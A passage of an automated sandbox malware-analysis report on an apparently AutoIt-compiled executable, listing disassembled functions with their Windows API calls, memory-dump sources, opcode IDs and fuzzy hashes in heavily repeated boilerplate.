                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 190572456-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a45d0f6615f049d54ccb6cd257a4a45fb43b8e31baabd57d5cfb2bdcd6727f95
                                                                                                                                                                                                                                                                                                          • Instruction ID: de8fd855cc85d0300344278d23622716f39f788dc647234372171d6b8104f0a8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a45d0f6615f049d54ccb6cd257a4a45fb43b8e31baabd57d5cfb2bdcd6727f95
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0041A461B19A42C5FE159F16A804A757391BF48BA8F09453DDE5ECB788EE3CE488D300
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4E06D0 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Show$Enable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2939132127-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: bf1680c497ddafbed20fc8edb41bbefd3142ef2a208a4fb9b9f279baa3c2d0bd
                                                                                                                                                                                                                                                                                                          • Instruction ID: 95f3d64e0e511af422a0bc8ea7eb653743c007ef33168c40b78f07b51333d863
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf1680c497ddafbed20fc8edb41bbefd3142ef2a208a4fb9b9f279baa3c2d0bd
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95514176D09686C1EB61CB16E4542783BA1FF88B68F6A403ACA5D877A5CF3DE4C1D700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C43209C Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3225163088-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 21f8d7a47469f2a49f07ab7fee508d90b20fe2808d7db8b1552c4b0775fa0cfc
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0678c0d3878b3a12c1969c4c4a26f9865721f612dbe65a36552a766ce34fca0c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21f8d7a47469f2a49f07ab7fee508d90b20fe2808d7db8b1552c4b0775fa0cfc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6315571919782CAFB608B11B85073A77A1BF88B98F04013DEA4983A65CF7CE895CB01
                                                                                                                                                                                                                                                                                                          Function 00007FF68C461DD4 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2067211477-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 41f6880fa826dc7585c1c84434b9e1d83cf5f40789d2fa38c65a87c25badbc06
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8189d10f6fdf2780a42b93ec665e8aa2f0554eac375ff06640b78bc829ab8497
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41f6880fa826dc7585c1c84434b9e1d83cf5f40789d2fa38c65a87c25badbc06
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79214F65A09F42C6FE15DBA1E41497AA3A0BF94B98F484439EF4E83759DF3CE884C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46F864 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ebe8654c569b7b411d1ff88ef690df32e320daa95c2d6a494747889ce22108c0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 751012b7eb09c30742f02f4fe2cd0d426bc465da734d3b2d70995a7d4d2da731
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebe8654c569b7b411d1ff88ef690df32e320daa95c2d6a494747889ce22108c0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8115866E18E03C1F6581129E452B791941FF563A9E09467CEBEEC7ADECF2CA8C0D301
                                                                                                                                                                                                                                                                                                          Function 00007FF68C45508C Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2117695475-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5e575c077726398a46d38c0ab7510b231f7ab4447039ca8bf6b85c165a1961f5
                                                                                                                                                                                                                                                                                                          • Instruction ID: f7d88f874e006f33dac2fad9f5697281d4fbeb7ed9424ed10833d9305e182cc7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e575c077726398a46d38c0ab7510b231f7ab4447039ca8bf6b85c165a1961f5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E119D90E08943D6FA0473B154166B922817F6035CF44243CFA8DCB1C7ED5CB4C4DB22
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4ADF5C Relevance: 7.5, APIs: 5, Instructions: 36sleepCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d1d48ba528d093844c112ef2a6b88edd344cae1c5bdc8ff2dee1276ed7d49edf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 76f5a4f8964e0cc19212f048f56a346bc4fa40f5b47981df9131b5e08b2bb0af
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1d48ba528d093844c112ef2a6b88edd344cae1c5bdc8ff2dee1276ed7d49edf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2017C61A18A06C2EB05CB30A89413A9361FF9979DB54023DF24FE35A5DF2DE4D5CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4B0740 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00007FF68C47B91D,?,?,?,00007FF68C441CE2), ref: 00007FF68C4B0774
                                                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(?,?,?,00007FF68C47B91D,?,?,?,00007FF68C441CE2), ref: 00007FF68C4B077F
                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,?,?,00007FF68C47B91D,?,?,?,00007FF68C441CE2), ref: 00007FF68C4B078D
                                                                                                                                                                                                                                                                                                          • ~SyncLockT.VCCORLIB ref: 00007FF68C4B0796
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4AFF10: CloseHandle.KERNEL32(?,?,?,00007FF68C4B079B,?,?,?,00007FF68C47B91D,?,?,?,00007FF68C441CE2), ref: 00007FF68C4AFF21
                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00007FF68C47B91D,?,?,?,00007FF68C441CE2), ref: 00007FF68C4B07A2
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3142591903-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
                                                                                                                                                                                                                                                                                                          • Instruction ID: d47d38671b9c9dfe6a2dee9974304cc45ec03a10345b9d5c52ca198448b50fad
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0401107AA08A41C6E650DB15E44022D7370FB88BA8F504039EB8E83A95DF38D496CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C432014 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2625713937-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9720c30a4924ec51527b5f5c9e76385c00257ab9f0335f2fc8f7d08be6e26667
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0d1d6aa304cf5aea753b96ce6937b87738b948b12bd6a99439db02bd4df4919
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18015A71D08686C6FA648B20B95473567B1BF88B99F18463CD52A87A61CF7DA0E8C701
                                                                                                                                                                                                                                                                                                          Function 00007FF68C461C30 Relevance: 7.5, APIs: 5, Instructions: 31threadCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1611280651-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 23a20e3609ab8e97003176603b087ea423037f5684bf8dc6ccfbbc412c2301bf
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8901D661B08A82D2FA14AB61959463C2261FF40B7CF54573DD63E936E9DF2CA8A8C340
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46FED0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                                                          • Opcode ID: c198a4eb709ee13625bde9cc1d7ff3a4e64f3f967d5eb97f4a55568a0741187b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 62f732b51a2770be26f7d09750142cd34963e5071d1ce37204a9e3ff12cdcf17
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c198a4eb709ee13625bde9cc1d7ff3a4e64f3f967d5eb97f4a55568a0741187b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A81A172E09246C6FB694F25B64837926B0FF1175CF04803EDA0AD7686DE6DE8E0E301
                                                                                                                                                                                                                                                                                                          Function 00007FF68C434CFC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 184comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434050: MapVirtualKeyW.USER32(?,?,?,00007FF68C434DDE), ref: 00007FF68C434082
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434050: MapVirtualKeyW.USER32(?,?,?,00007FF68C434DDE), ref: 00007FF68C434090
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434050: MapVirtualKeyW.USER32(?,?,?,00007FF68C434DDE), ref: 00007FF68C4340A0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434050: MapVirtualKeyW.USER32(?,?,?,00007FF68C434DDE), ref: 00007FF68C4340B0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434050: MapVirtualKeyW.USER32(?,?,?,00007FF68C434DDE), ref: 00007FF68C4340BE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C434050: MapVirtualKeyW.USER32(?,?,?,00007FF68C434DDE), ref: 00007FF68C4340CC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C4340DC: RegisterWindowMessageW.USER32(?,?,?,00007FF68C434F68), ref: 00007FF68C434146
                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C43106D), ref: 00007FF68C435042
                                                                                                                                                                                                                                                                                                          • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C43106D), ref: 00007FF68C4350C8
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68C43106D), ref: 00007FF68C47B336
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt
